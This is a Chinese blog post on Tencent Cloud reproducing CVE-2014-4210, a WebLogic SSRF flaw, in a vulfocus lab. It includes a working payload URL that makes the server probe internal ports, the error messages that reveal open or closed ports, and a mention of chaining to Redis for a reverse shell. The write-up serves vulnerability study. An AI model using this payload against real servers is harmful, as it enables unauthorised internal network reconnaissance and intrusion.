前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2014-4210 Weblogic SSRF漏洞

CVE-2014-4210 Weblogic SSRF漏洞

原创
作者头像
用户8478947
发布2022-12-29 16:53:57
4480
发布2022-12-29 16:53:57
举报
文章被收录于专栏:安全学习安全学习

漏洞简介

事项

描述

漏洞概述

探测内网存活的ip和端口,探测内网系统中存在的文件,如果内网有IP开启redis服务,我们就可以用存在ssrf的服务器给含有redis服务的服务器发送命令,然后反弹shell,有些ssrf还可以利用file协议对目标机本地的文件进行读取。路径是uddiexplorer/SearchPublicRegistries.jsp

影响范围

10.0.2 – 10.3.6

漏洞编号

CVE-2014-4210

漏洞搭建

这里使用vulfocus进行复现。

image-20221222161849183
image-20221222161849183

漏洞复现

访问http://192.168.146.167:29194/uddiexplorer/SearchPublicRegistries.jsp,发现需要登录,作罢。

image-20221222161954947
image-20221222161954947

构造恶意payload,查看7001端口是否开放(默认的weblogic端口)

代码语言:javascript
复制
 http://192.168.146.167:29194/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
image-20221222162038967
image-20221222162038967

发现当内网存在该资源的时候,其特征是

代码语言:javascript
复制
 weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://127.0.0.1:7001 returned a 404 error code (Not Found).  Please ensure that your URL is correct, and the web service has deployed without error.

而不存在该资源的时候,其特征是

代码语言:javascript
复制
 weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' addresses, but could not connect over HTTP to server: '127.0.0.1', port: '6379'

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞简介
  • 漏洞搭建
  • 漏洞复现
相关产品与服务
云数据库 Redis
腾讯云数据库 Redis(TencentDB for Redis)是腾讯云打造的兼容 Redis 协议的缓存和存储服务。丰富的数据结构能帮助您完成不同类型的业务场景开发。支持主从热备,提供自动容灾切换、数据备份、故障迁移、实例监控、在线扩容、数据回档等全套的数据库服务。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档